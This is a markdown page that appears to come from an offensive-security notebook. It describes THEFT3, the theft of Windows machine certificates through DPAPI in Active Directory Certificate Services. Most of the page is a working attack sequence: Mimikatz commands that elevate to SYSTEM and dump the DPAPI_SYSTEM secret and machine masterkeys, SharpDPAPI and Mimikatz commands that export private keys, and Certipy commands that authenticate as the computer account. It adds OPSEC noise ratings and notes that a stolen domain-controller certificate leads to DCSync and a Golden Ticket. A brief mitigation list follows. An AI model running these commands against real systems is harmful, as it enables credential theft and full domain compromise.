theft3-machine-certificate-theft-via-dpapi.md (3987B)
1 --- 2 title: "THEFT3 — Machine Certificate Theft via DPAPI" 3 description: "Identical concept to THEFT2 — User Certificate Theft via DPAPI but for machine certificates. These are protected by the machine DPAPI masterkey, which is…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "privilege-escalation"] 7 tools: ["Mimikatz", "Certipy", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT3 — Machine Certificate Theft via DPAPI.md" 11 --- 12 # THEFT3 — Machine Certificate Theft via DPAPI 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Credential Theft (local, machine DPAPI) | 19 | **Difficulty** | Medium | 20 | **Pre-requisites** | **SYSTEM** (or local admin) on the target host | 21 | **Tools** | SharpDPAPI, Mimikatz, Certipy | 22 | **OPSEC Noise** | Medium — requires SYSTEM, reads machine masterkeys | 23 | **One-liner** | As SYSTEM, decrypt the **machine's** certificate private keys using the machine DPAPI masterkey, yielding a computer-account cert you can authenticate with. | 24 25 *** 26 27 ## What Is THEFT3? 28 29 Identical concept to THEFT2 — User Certificate Theft via DPAPI but for **machine** certificates. These are protected by the **machine DPAPI masterkey**, which is itself protected by the `DPAPI_SYSTEM` LSA secret — so you need SYSTEM, not just a user session. A stolen machine cert lets you authenticate as `HOST$`, which is powerful: computer accounts can be Kerberoast/RBCD targets, and a DC's own cert enables DCSync-level access. 30 31 **Key locations (machine):** 32 33 ``` 34 Private keys : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\ 35 C:\ProgramData\Microsoft\Crypto\Keys\ (CNG) 36 Masterkeys : C:\ProgramData\Microsoft\Protect\S-1-5-18\ 37 Certificates : C:\ProgramData\Microsoft\SystemCertificates\My\ 38 ``` 39 40 *** 41 42 ## Step 1 — Become SYSTEM & Grab the Machine Masterkey 43 44 ```powershell 45 mimikatz # privilege::debug 46 mimikatz # token::elevate # to SYSTEM 47 mimikatz # lsadump::secrets # reveals DPAPI_SYSTEM secret 48 mimikatz # dpapi::masterkey /in:"C:\ProgramData\Microsoft\Protect\S-1-5-18\<GUID>" /system 49 ``` 50 51 *** 52 53 ## Step 2 — Export Machine Certificates 54 55 ```powershell 56 # SharpDPAPI — /machine flag targets the SYSTEM store & machine masterkeys 57 SharpDPAPI.exe certificates /machine 58 59 # Mimikatz — export from local machine store (patch providers if non-exportable) 60 mimikatz # crypto::certificates /systemstore:local_machine /export 61 mimikatz # crypto::cng 62 mimikatz # crypto::certificates /systemstore:local_machine /export 63 ``` 64 65 *** 66 67 ## Step 3 — Authenticate as the Machine Account 68 69 ```bash 70 certipy-ad cert -export -pfx machine.pfx -password '' -out clean.pfx 71 certipy-ad auth -pfx clean.pfx -dc-ip $TARGET 72 # -> HOST$ TGT + machine NT hash 73 ``` 74 75 > [!warning] Stealing a DC's certificate = domain compromise 76 > If the host is a Domain Controller, its machine cert authenticates as `DC01$`, which has replication rights. From that TGT you can DCSync `krbtgt` and forge a Golden Ticket. Treat DC cert theft as full domain takeover. 77 78 *** 79 80 ## OPSEC Considerations 81 82 | Action | Artefact | Noise | 83 | :-- | :-- | :-- | 84 | `token::elevate` / `lsadump::secrets` | LSASS access, SYSTEM token | 🟡 Medium | 85 | Reading MachineKeys | file access (if audited) | 🟢 Low | 86 | `crypto::cng` provider patch | KeyIso tamper | 🔴 High | 87 88 *** 89 90 ## Mitigation 91 92 - Back machine keys with a **TPM** (default for modern Windows) so the raw DPAPI blob is insufficient. 93 - Restrict local admin/SYSTEM; deploy Credential Guard and LSASS protection. 94 - Tier your DCs and treat any DC SYSTEM access as a domain-wide incident. 95 96 *** 97 98 ## See Also 99 100 - _ADCS Attack Methodology Guide · THEFT2 — User Certificate Theft via DPAPI · PERSIST2 — Machine Account Persistence via Certificates 101 - Sources: SpecterOps *Certified Pre-Owned*; [SharpDPAPI](https://github.com/GhostPack/SharpDPAPI)